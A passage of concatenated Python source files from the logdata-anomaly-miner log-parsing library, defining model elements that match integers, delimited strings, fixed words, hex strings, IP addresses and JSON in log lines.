element_id: str, value_sign_type: str = SIGN_TYPE_NONE, value_pad_type: str = PAD_TYPE_NONE): """ Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param value_sign_type defines the possible start characters in the value. With the SIGN_TYPE_NONE only digits are allowed, with SIGN_TYPE_OPTIONAL digits and a minus sign are allowed and with SIGN_TYPE_MANDATORY the value must start with + or -. @param value_pad_type defines the padding values which can prefix the numerical value. With PAD_TYPE_NONE no padding is allowed, PAD_TYPE_ZERO allows zeros before the value and PAD_TYPE_BLANK allows spaces before the value. """ super().__init__(element_id, value_sign_type=value_sign_type, value_pad_type=value_pad_type) if value_sign_type not in (DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL, DecimalIntegerValueModelElement.SIGN_TYPE_MANDATORY): msg = f"Invalid value_sign_type {value_sign_type}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if value_pad_type not in (DecimalIntegerValueModelElement.PAD_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_ZERO, DecimalIntegerValueModelElement.PAD_TYPE_BLANK): msg = f"Invalid value_pad_type {value_pad_type}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.digits = set(b"0123456789") def get_match_element(self, path: str, match_context): """ Find the maximum number of bytes forming a integer number according to the parameters specified. @param path to be printed in the MatchElement. @param match_context the match_context to be analyzed. @return a match when at least one byte being a digit was found. """ data = match_context.match_data if not data or (data[0] not in self.start_characters): return None match_len = 1 if self.pad_characters == b"" and data.startswith(b"0") and not data.startswith(b"0.") and len(data) > 1 and \ data[1] in self.digits: return None for test_byte in data[match_len:]: if test_byte not in self.pad_characters: break match_len += 1 num_start_pos = match_len for test_byte in data[match_len:]: if test_byte not in self.digits: break match_len += 1 if match_len == 1: # skipcq: PTC-W0048 if data[0] not in self.digits: return None elif num_start_pos == match_len and match_len == 1: # only return None if match_len is 1 to allow 00 with zero padding. return None match_string = data[:match_len] try: if self.pad_characters == b" " and match_string[0] in b"+-": match_value = int(match_string.replace(b" ", b"", 1)) else: match_value = int(match_string) except ValueError: return None match_context.update(match_string) return MatchElement(f"{path}/{self.element_id}", match_string, match_value, None) DelimitedDataModelElement.py000066400000000000000000000050221437606560100361310ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module defines a model element that takes any string up to a specific delimiter string. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface import re class DelimitedDataModelElement(ModelElementInterface): """Find a string delimited by given non-escaped delimiter string, possibly a match of zero byte length.""" def __init__(self, element_id: str, delimiter: bytes, escape: bytes = None, consume_delimiter: bool = False): """ Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param delimiter a non-escaped delimiter string to search for. @param escape a character to escape in the string. @param consume_delimiter True if the delimiter character should also be consumed. """ super().__init__(element_id, delimiter=delimiter, escape=escape, consume_delimiter=consume_delimiter) def get_match_element(self, path: str, match_context): """ Find the maximum number of bytes before encountering the non-escaped delimiter. @return a match when at least one byte was found but not the delimiter itself. """ data = match_context.match_data match_len = -1 if self.escape is None: search = re.search(re.escape(self.delimiter), data) if search is not None: match_len = search.start() else: search = re.search(rb"(?. """ from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.parsing.MatchElement import MatchElement from aminer import AminerConfig from typing import Union class ElementValueBranchModelElement(ModelElementInterface): """This class defines an element that selects a branch path based on a previous model value.""" def __init__(self, element_id: str, value_model: ModelElementInterface, value_path: Union[str, None], branch_model_dict: dict, default_branch: Union[str, int] = None): """ Create the branch model element. @param element_id an identifier for the ModelElement which is shown in the path. @param value_model the ModelElement which has to match the data. @param value_path the relative path to the target value from the value_model element on. When the path does not resolve to a value, this model element will not match. A path value of None indicates, that the match element of the value_model should be used directly. @param branch_model_dict a dictionary to select a branch for the value identified by valuePath. @param default_branch when lookup in branch_model_dict fails, use this as default branch or fail when None. """ self.value_path = value_path super().__init__( element_id, value_model=value_model, value_path=value_path, branch_model_dict=branch_model_dict, default_branch=default_branch) def get_match_element(self, path: str, match_context): """ Try to find a match on given data for the test model and the selected branch. @param path the model path to the parent model element invoking this method. @param match_context an instance of MatchContext class holding the data context to match against. @return the matchElement or None if the test model did not match, no branch was selected or the branch did not match. """ current_path = f"{path}/{self.element_id}" start_data = match_context.match_data model_match = self.value_model.get_match_element(current_path, match_context) if model_match is None: return None # Now extract the test path value from the model_match. From here on, the matchContext is already modified so we must NEVER just # return but revert the changes in the context first. remaining_value_path = self.value_path test_match = model_match current_test_path = test_match.get_path() while remaining_value_path is not None: next_part_pos = remaining_value_path.find('/') if next_part_pos <= 0: current_test_path += '/' + remaining_value_path remaining_value_path = None else: current_test_path += '/' + remaining_value_path[:next_part_pos] remaining_value_path = remaining_value_path[next_part_pos + 1:] match_children = test_match.get_children() test_match = None if match_children is None: break for child in match_children: if child.get_path() == current_test_path: test_match = child break branch_match = None if test_match is not None: if isinstance(test_match.get_match_object(), bytes): branch_model = self.branch_model_dict.get(test_match.get_match_object().decode(AminerConfig.ENCODING), self.default_branch) else: branch_model = self.branch_model_dict.get(test_match.get_match_object(), self.default_branch) if branch_model is not None: branch_match = branch_model.get_match_element(current_path, match_context) if branch_match is None: match_context.match_data = start_data return None return MatchElement(current_path, start_data[:len(start_data) - len(match_context.match_data)], start_data[:len(start_data) - len(match_context.match_data)], [model_match, branch_match]) FirstMatchModelElement.py000066400000000000000000000034211437606560100355040ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element that allows branches. The first matching branch is taken. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.ModelElementInterface import ModelElementInterface class FirstMatchModelElement(ModelElementInterface): """This class defines a model element to return the match from the the first matching child model within a given list.""" def __init__(self, element_id: str, children: list): """ Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param children a list of child elements to be iterated through. """ super().__init__(element_id, children=children) def get_match_element(self, path: str, match_context): """@return None when there is no match, MatchElement otherwise.""" current_path = f"{path}/{self.element_id}" match_data = match_context.match_data for child_element in self.children: child_match = child_element.get_match_element(current_path, match_context) if child_match is not None: return child_match match_context.match_data = match_data return None FixedDataModelElement.py000066400000000000000000000033341437606560100352740ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module defines a model element representing a fixed string. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class FixedDataModelElement(ModelElementInterface): """ This class defines a model element of a fixed string. The model element is considered a match if the fixed string is found at this position in the log atom. """ def __init__(self, element_id: str, fixed_data: bytes): """ Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param fixed_data a non-escaped delimiter string to search for. """ super().__init__(element_id, fixed_data=fixed_data) def get_match_element(self, path: str, match_context): """@return None when there is no match, MatchElement otherwise.""" if not match_context.match_data.startswith(self.fixed_data): return None match_context.update(self.fixed_data) return MatchElement(f"{path}/{self.element_id}", self.fixed_data, self.fixed_data, None) FixedWordlistDataModelElement.py000066400000000000000000000042321437606560100370220ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module defines a model element to detect fixed strings from a list of words. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.parsing.MatchElement import MatchElement class FixedWordlistDataModelElement(ModelElementInterface): """ This class defines a model element to detect fixed strings from a list of words. The match will return the position of the word in the search list, thus the sorting of the list is important. Apart from that, the wordlist must not contain any words, that are identical to the beginning of words later in the list. In that case, the longer match could never be detected. """ def __init__(self, element_id: str, wordlist: list): """ Create the model element. @param wordlist the list of words to search for. If it does not fulfill the sorting criteria mentioned in the class documentation, an Exception will be raised. """ super().__init__(element_id, wordlist=wordlist) def get_match_element(self, path: str, match_context): """@return None when there is no match, MatchElement otherwise.""" data = match_context.match_data match_data = None word_pos = 0 for word in self.wordlist: if data.startswith(word): match_data = word break word_pos += 1 if match_data is None: return None match_context.update(match_data) return MatchElement(f"{path}/{self.element_id}", match_data, word_pos, None) HexStringModelElement.py000066400000000000000000000043401437606560100353540ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module defines a model element that represents a hex string of arbitrary length. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer import AminerConfig class HexStringModelElement(ModelElementInterface): """This class just tries to strip off as many hex bytes as possible from a given data string.""" def __init__(self, element_id: str, upper_case: bool = False): """ Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param upper_case if True, the letters of the hex alphabet are uppercase, otherwise they are lowercase. """ super().__init__(element_id, upper_case=upper_case) def get_match_element(self, path: str, match_context): """ Find the maximum number of bytes forming a integer number according to the parameters specified. @return a match when at least one byte being a digit was found """ m = self.hex_regex.match(match_context.match_data) if m is None: return None match_len = m.span(0)[1] match_object = match_context.match_data[:match_len] try: pad = "" if len(match_object.decode(AminerConfig.ENCODING)) % 2 != 0: pad = "0" match_string = bytes.fromhex(pad + match_object.decode(AminerConfig.ENCODING)) except ValueError: return None match_context.update(match_object) return MatchElement(f"{path}/{self.element_id}", match_string, match_object, None) IpAddressDataModelElement.py000066400000000000000000000117101437606560100361100ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module defines a model element that represents an IP address. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import re from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class IpAddressDataModelElement(ModelElementInterface): """This class defines a model element that matches an IP address.""" def __init__(self, element_id: str, ipv6: bool = False): """ Create an element to match IP addresses. @param element_id an identifier for the ModelElement which is shown in the path. @param ipv6 if True, IPv6 addresses are parsed, IPv4 addresses are parsed otherwise. """ super().__init__(element_id, ipv6=ipv6) if not ipv6: # self.regex = re.compile(br"((2[0-4][0-9]|1[0-9][0-9]|25[0-5]|[1-9]?[0-9])\.){3}(2[0-4][0-9]|1[0-9][0-9]|25[0-5]|[1-9]?[0-9])") # use a simpler regex to improve the performance. self.regex = re.compile(br"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}") self.extract = extract_ipv4_address else: # modified regex from https://community.helpsystems.com/forums/intermapper/miscellaneous-topics/ # 5acc4fcf-fa83-e511-80cf-0050568460e4?_ga=2.113564423.1432958022.1523882681-2146416484.1523557976 i4 = br"((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})" self.regex = re.compile( br"((([0-9A-Fa-f]{1,4}:){7}([0-9A-Fa-f]{1,4}|:))|(([0-9A-Fa-f]{1,4}:){6}(:[0-9A-Fa-f]{1,4}|"+i4+br"|:))|(([0-9A-Fa-f]{1,4}:" br"){5}(((:[0-9A-Fa-f]{1,4}){1,2})|:"+i4+br"|:))|(([0-9A-Fa-f]{1,4}:){4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?" br":"+i4+br")|:))|(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]{1,4}){0,2}:"+i4+br")|:))|(([0-9A-Fa-f]{" br"1,4}:){2}(((:[0-9A-Fa-f]{1,4}){1,5})|((:[0-9A-Fa-f]{1,4}){0,3}:"+i4+br")|:))|(([0-9A-Fa-f]{1,4}:){1}(((:[0-9A-Fa-f]{" br"1,4}){1,6})|((:[0-9A-Fa-f]{1,4}){0,4}:"+i4+br")|:))|(:(((:[0-9A-Fa-f]{1,4}){1,7})|((:[0-9A-Fa-f]{1,4}){0,5}:"+i4+br")|:" br")))(%.+)?") self.extract = extract_ipv6_address def get_match_element(self, path: str, match_context): """ Read an IP address at the current data position. When found, the match_object will be. Allowed formats for IPv6 addresses are defined in RFC4291 section 2.2. However, trailing IPv4 addresses (for example ::FFFF:129.144.52.38) are not allowed. """ data = match_context.match_data m = self.regex.match(data) if m is None: return None match_len = m.span(0)[1] if self.extract is extract_ipv6_address and (b"." in m.group()[:match_len].split(b":")[-1] or (len(data) > match_len and ( re.compile(br"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}").match(data[data.rfind(b":", 0, match_len) + 1:]) is not None or ( data.find(b"::", match_len) == match_len and b"::" in data)))): return None extracted_address = self.extract(m.group(), match_len) if extracted_address is None: return None match_string = data[:match_len] match_context.update(match_string) return MatchElement(f"{path}/{self.element_id}", match_string, extracted_address, None) def extract_ipv4_address(data: bytes, match_len: int): """Calculate integer values from ipv4 addresses.""" numbers = [int(number) for number in data[:match_len].split(b".")] for number in numbers: if number > 255: return None return (numbers[0] << 24) + (numbers[1] << 16) + (numbers[2] << 8) + numbers[3] def extract_ipv6_address(data: bytes, match_len: int): """Calculate integer values from ipv6 addresses.""" parts = data[:match_len].split(b":") if b"" in parts: index = parts.index(b"") # addresses can start or end with ::. Handle this special case. parts = [number for number in parts if number != b""] parts = parts[:index] + [b"0"] * (8 - len(parts)) + parts[index:] numbers = [int(b"0x" + number, 16) for number in parts] for number in numbers: if number > 65535: return None return (numbers[0] << 112) + (numbers[1] << 96) + (numbers[2] << 80) + (numbers[3] << 64) + (numbers[4] << 48) + (numbers[5] << 32)\ + (numbers[6] << 16) + (numbers[7]) JsonModelElement.py000066400000000000000000000667371437606560100343740ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module defines a model element that takes any string up to a specific delimiter string. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import json import warnings import logging from typing import List, Union, Any from json import JSONDecodeError from aminer.parsing.MatchElement import MatchElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.AminerConfig import DEBUG_LOG_NAME warnings.filterwarnings("ignore", category=DeprecationWarning) debug_log_prefix = "JsonModelElement: " def format_float(val): """This function formats the float-value and parses the sign and the exponent.""" exp = None if "e" in val: exp = "e" elif "E" in val: exp = "E" if "+" in val: sign = "+" else: sign = "-" if exp is not None: pos_point = val.find(exp) if "." in val: pos_point = val.find(".") if len(val) - val.find(sign) <= 2: result = format(float(val), f"1.{val.find(exp) - pos_point}E")[:-2] result += format(float(val), f"1.{val.find(exp) - pos_point}E")[-1] return result return format(float(val), f"1.{val.find(exp) - pos_point}E") return float(val) class JsonModelElement(ModelElementInterface): """Parse single- or multi-lined JSON data.""" def __init__(self, element_id: str, key_parser_dict: dict, optional_key_prefix: str = "optional_key_", nullable_key_prefix: str = "+", allow_all_fields: bool = False): """ Initialize the JsonModelElement. @param element_id: The ID of the element. @param key_parser_dict: A dictionary of all keys with the according parsers. If a key should be optional, the associated parser must start with the OptionalMatchModelElement. To allow every key in a JSON object use "key": "ALLOW_ALL". To allow only empty arrays - [] - use "key": "EMPTY_ARRAY". To allow only empty objects - {} - use "key": "EMPTY_OBJECT". To allow only empty strings - "" - use "key": "EMPTY_STRING". To allow all keys in an object for a parser use "ALLOW_ALL_KEYS": parser. To allow only null values use "key": "NULL_OBJECT". @param optional_key_prefix: If some key starts with the optional_key_prefix it will be considered optional. @param nullable_key_prefix: The value of this key may be null instead of any expected value. @param allow_all_fields: Unknown fields are skipped without parsing with any parsing model. """ super().__init__(element_id, key_parser_dict=key_parser_dict, optional_key_prefix=optional_key_prefix, nullable_key_prefix=nullable_key_prefix, allow_all_fields=allow_all_fields) self.dec_escapes = False self.validate_key_parser_dict(key_parser_dict) def validate_key_parser_dict(self, dictionary: dict): """Validate the key_parser_dict.""" for value in dictionary.values(): if isinstance(value, ModelElementInterface): continue if isinstance(value, list): if len(value) == 0: msg = "lists in key_parser_dict must have at least one entry." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) for v in value: if isinstance(v, dict): self.validate_key_parser_dict(v) elif isinstance(value, dict): self.validate_key_parser_dict(value) elif value not in ("ALLOW_ALL", "EMPTY_ARRAY", "EMPTY_OBJECT", "EMPTY_STRING", "ALLOW_ALL_KEYS", "NULL_OBJECT"): msg = "wrong type found in key_parser_dict." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def is_escaped_unicode(self, text: str): # skipcq: PYL-R0201 """Check if the text contains only ascii characters.""" if all(ord(c) < 128 for c in text): # is escaped unicode ascii? return True return False def get_full_key(self, key, dictionary): """Find the full key in the dictionary.""" options = [self.optional_key_prefix + self.nullable_key_prefix + key, self.nullable_key_prefix + self.optional_key_prefix + key, self.optional_key_prefix + key, self.nullable_key_prefix + key] for option in options: if option in dictionary: return option return key def get_stripped_key(self, key): """Return the key without optional_key_prefix and nullable_key_prefix.""" if key.startswith(self.optional_key_prefix): key = key[len(self.optional_key_prefix):] if key.startswith(self.nullable_key_prefix): key = key[len(self.nullable_key_prefix):] if key.startswith(self.optional_key_prefix): key = key[len(self.optional_key_prefix):] return key def is_nullable_key(self, key): """Check if the key is nullable.""" return key.startswith(self.nullable_key_prefix) or ( key.startswith(self.optional_key_prefix) and key[len(self.optional_key_prefix):].startswith(self.nullable_key_prefix)) def get_match_element(self, path: str, match_context): """ Try to parse all the match_context against JSON. When a match is found, the match_context is updated accordingly. @param path the model path to the parent model element invoking this method. @param match_context an instance of MatchContext class holding the data context to match against. @return the matchElement or None if model did not match. """ current_path = f"{path}/{self.element_id}" old_match_data = match_context.match_data matches: Union[List[Union[MatchElement, None]]] = [] try: index = 0 # There can be a valid case in which the text contains for example \x2d, \\x2d or \\\\x2d, which basically should be decoded # into the unicode form. while index != -1: index = match_context.match_data.find(rb"\x") if index != -1: try: match_context.match_data = match_context.match_data.decode("unicode-escape").encode() except UnicodeDecodeError: break index = 0 while index != -1: index = match_context.match_data.find(b"\\", index) if index != -1 and len(match_context.match_data) - 1 > index and match_context.match_data[ index + 1] not in b"\\'\"abfnrtv/": match_context.match_data = match_context.match_data[:index] + b"\\" + match_context.match_data[index:] index += 2 elif index != -1: index += 2 json_match_data = json.loads(match_context.match_data, parse_float=format_float) if not isinstance(json_match_data, dict): return None except JSONDecodeError as e: logging.getLogger(debug_log_prefix + DEBUG_LOG_NAME).debug(e) return None self.dec_escapes = True if self.is_escaped_unicode(match_context.match_data.decode()): match_context.match_data = match_context.match_data.decode("unicode-escape").encode() self.dec_escapes = False matches += self.parse_json_dict(self.key_parser_dict, json_match_data, current_path, match_context) remove_chars = b' }]"\r\n' match_data = match_context.match_data for c in remove_chars: match_data = match_data.replace(bytes(chr(c), encoding="utf-8"), b"") if None in matches or (match_data != b"" and len(matches) > 0): logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "get_match_element_main NONE RETURNED\n" + match_context.match_data.strip(b' }]"\r\n').decode()) match_context.match_data = old_match_data return None # remove all remaining spaces and brackets. match_context.update(match_context.match_data) if len(matches) == 0: resulting_matches = None else: resulting_matches = matches return MatchElement(current_path, str(json_match_data).encode(), json_match_data, resulting_matches) def parse_json_dict(self, json_dict: dict, json_match_data: dict, current_path: str, match_context): """Parse a json dictionary.""" matches: List[Union[MatchElement, None]] = [] if not self.check_keys(json_dict, json_match_data, match_context): return [None] for i, key in enumerate(json_match_data.keys()): split_key = key key = self.get_full_key(key, json_dict) if key not in json_dict: index = match_context.match_data.find(key.encode()) match_context.update(match_context.match_data[:index]) logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 2" + key + str(json_dict)) if "ALLOW_ALL_KEYS" in json_dict.keys(): key = "ALLOW_ALL_KEYS" elif self.allow_all_fields: index = match_context.match_data.find(key.encode()) + len(key.encode()) index += len(match_context.match_data) - len(match_context.match_data[index:].lstrip(b' \n\t:"')) + \ len(str(json_match_data[key])) match_context.update(match_context.match_data[:index]) if match_context.match_data.replace(b"}", b"").replace(b"]", b"").replace(b'"', b"") == b"": match_context.update(match_context.match_data) continue else: return [None] value = json_dict[key] if isinstance(value, (dict, list)) and (not isinstance(json_match_data, dict) or split_key not in json_match_data): logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 3, Key: " + split_key + ", Value: " + repr(value)) return [None] if isinstance(value, dict): if json_match_data[split_key] is None and (self.is_nullable_key(key) or json_dict[key] == "NULL_OBJECT"): data = b"null" matches.append(MatchElement(current_path, data, data, None)) index = match_context.match_data.find(data) if match_context.match_data[index + 4] == 34: # " index += 1 match_context.update(match_context.match_data[:index + len(data)]) return matches matches += self.parse_json_dict(value, json_match_data[split_key], f"{current_path}/{split_key}", match_context) if json_match_data[split_key] == {}: index = match_context.match_data.find(split_key.encode()) index = match_context.match_data.find(b"}", index) match_element = MatchElement( current_path+"/"+key, match_context.match_data[:index], match_context.match_data[:index], None) matches.append(match_element) match_context.update(match_context.match_data[:index]) if len(matches) == 0 or matches[-1] is None: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "No match found for key " + split_key) return matches elif isinstance(value, list): res = self.parse_json_array(json_dict, json_match_data, key, split_key, current_path, matches, match_context, i) if res is not None: return res elif value == "EMPTY_OBJECT": if isinstance(json_match_data[split_key], dict) and len(json_match_data[split_key].keys()) == 0: index = match_context.match_data.find(b"}") + 1 match_element = MatchElement( current_path+"/"+key, match_context.match_data[:index], match_context.match_data[:index], None) matches.append(match_element) match_context.update(match_context.match_data[:index]) else: logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "EMPTY_OBJECT " + split_key + " is not empty. Keys: " + str(json_match_data[split_key].keys())) matches.append(None) elif json_dict[key] == "EMPTY_ARRAY": if isinstance(json_match_data[split_key], list) and len(json_match_data[split_key]) == 0: index = match_context.match_data.find(b"]") + 1 match_element = MatchElement( current_path+"/"+key, match_context.match_data[:index], match_context.match_data[:index], None) matches.append(match_element) match_context.update(match_context.match_data[:index]) else: logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "EMPTY_ARRAY " + split_key + " is not empty. Data: " + str(json_match_data[split_key])) matches.append(None) else: if key != split_key and split_key not in json_match_data: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + f"Optional Key {key} not found in json_match_data") continue if split_key not in json_match_data: logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + f"Key {split_key} not found in json_match_data. RETURN [NONE] 4") return [None] match_element, index, data = self.parse_json_object(json_dict, json_match_data, key, split_key, current_path, match_context) matches.append(match_element) if index == -1 and match_element is None: backslash = b"\\" logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + f"Necessary element did not match! Key: {key}, MatchElement: {match_element}, Data: " f"{data.decode()}, IsFloat {isinstance(json_match_data[split_key], float)}, Index: {index}, " f"MatchContext: {match_context.match_data.replace(backslash, b'').decode()}") return matches match_context.update(match_context.match_data[:index + len(data)]) missing_keys = [x for x in json_dict if self.get_stripped_key(x) not in json_match_data and x != "ALLOW_ALL_KEYS" and not (x.startswith(self.optional_key_prefix) or x.startswith(self.nullable_key_prefix + self.optional_key_prefix))] for key in missing_keys: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "Missing Key: " + key) return [None] return matches def check_keys(self, json_dict, json_match_data, match_context): """Check if no keys are missing and if the value types match.""" if "ALLOW_ALL_KEYS" in json_dict.keys(): return True if json_match_data is None: return False missing_keys = [x for x in json_dict if self.get_stripped_key(x) not in json_match_data and not (x.startswith( self.optional_key_prefix) or x.startswith(self.nullable_key_prefix + self.optional_key_prefix))] for key in missing_keys: if (not key.startswith(self.nullable_key_prefix) or ( key.startswith(self.nullable_key_prefix) and key[len(self.nullable_key_prefix):] not in json_match_data)): index = match_context.match_data.find(key.encode()) match_context.update(match_context.match_data[:index]) logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 1. Key: " + key) return False for key in json_dict.keys(): k = self.get_stripped_key(key) if not isinstance(json_match_data, dict) or (k in json_match_data and isinstance(json_match_data[k], list) and not isinstance( json_dict[key], list) and json_dict[key] != "EMPTY_ARRAY"): index = match_context.match_data.find(key.encode()) match_context.update(match_context.match_data[:index]) logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 5. Key: " + key) return False return True def flatten_list(self, lst: list): """Flatten a list of lists using this method recursively.""" if not isinstance(lst, list): return None res: List[Any] = [] for val in lst: if isinstance(val, list): res += self.flatten_list(val) else: res.append(val) return res def parse_json_array(self, json_dict: dict, json_match_data: dict, key: str, split_key: str, current_path: str, matches: list, match_context, i: int): """Parse an array in a json object.""" if self.is_nullable_key(key) and json_match_data[split_key] is None: return None if not isinstance(json_match_data[split_key], list): if key.startswith(self.optional_key_prefix) and json_match_data[split_key] is None: data = b"null" index = match_context.match_data.find(split_key.encode() + b'":') + len(split_key.encode() + b'":') index += match_context.match_data[index:].find(b"null") + len(b"null") match_context.update(match_context.match_data[:index]) matches.append(MatchElement(current_path, data, data, None)) return matches logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "Key " + split_key + " is no array. Data: " + str(json_match_data[split_key])) return [None] search_string = b"]" match_array = self.flatten_list(json_match_data[split_key]) value = self.flatten_list(json_dict[key]) for j, data in enumerate(match_array): for k, val in enumerate(value): if isinstance(data, str): enc = "utf-8" if self.is_escaped_unicode(data) and self.dec_escapes: enc = "unicode-escape" data = data.encode(enc) if data is None: data = b"null" elif not isinstance(data, bytes): data = str(data).encode() if isinstance(val, dict): # skipcq: PYL-R1723 matches += self.parse_json_dict( val, match_array[j], f"{current_path}/{split_key}", match_context) if matches[-1] is None: if len(value) - 1 == k: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "No match found for key " + split_key) return matches del matches[-1] continue break else: if val == "ALLOW_ALL": logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "ALLOW_ALL (ARRAY)") match_element = MatchElement(current_path+"/"+key, data, data, None) elif json_dict[key] == "EMPTY_ARRAY": if isinstance(data, list) and len(data) == 0: index = match_context.match_data.find(search_string) match_element = MatchElement( current_path+"/"+key, match_context.match_data[:index], match_context.match_data[:index], None) match_context.update(match_context.match_data[:index]) else: logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "EMPTY_ARRAY " + split_key + " is not empty. Data: " + json_match_data[split_key]) return None else: match_element = val.get_match_element(current_path, MatchContext(data)) if match_element is not None and len(match_element.match_string) != len(data): logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "MatchElement NONE 1. match_string: " + match_element.match_string.decode() + ", data: " + data.decode()) match_element = None index = match_context.match_data.find(data) if match_element is None: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "MatchElement NONE 2. Data: " + data.decode()) index = -1 match_context.update(match_context.match_data[:index + len(data)]) if index == -1 and val == "ALLOW_ALL": logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "ALLOW_ALL (ARRAY-ELEMENT). Data: " + match_context.match_data.decode()) index = match_context.match_data.find(search_string) match_context.update(match_context.match_data[:index]) if match_element is not None or (match_element is None and not key.startswith(self.optional_key_prefix)): matches.append(match_element) if index == -1: if len(value) - 1 == k: return matches del matches[-1] continue if len(matches) == 0: return [None] if matches[-1] is None: if len(value) - 1 == k: 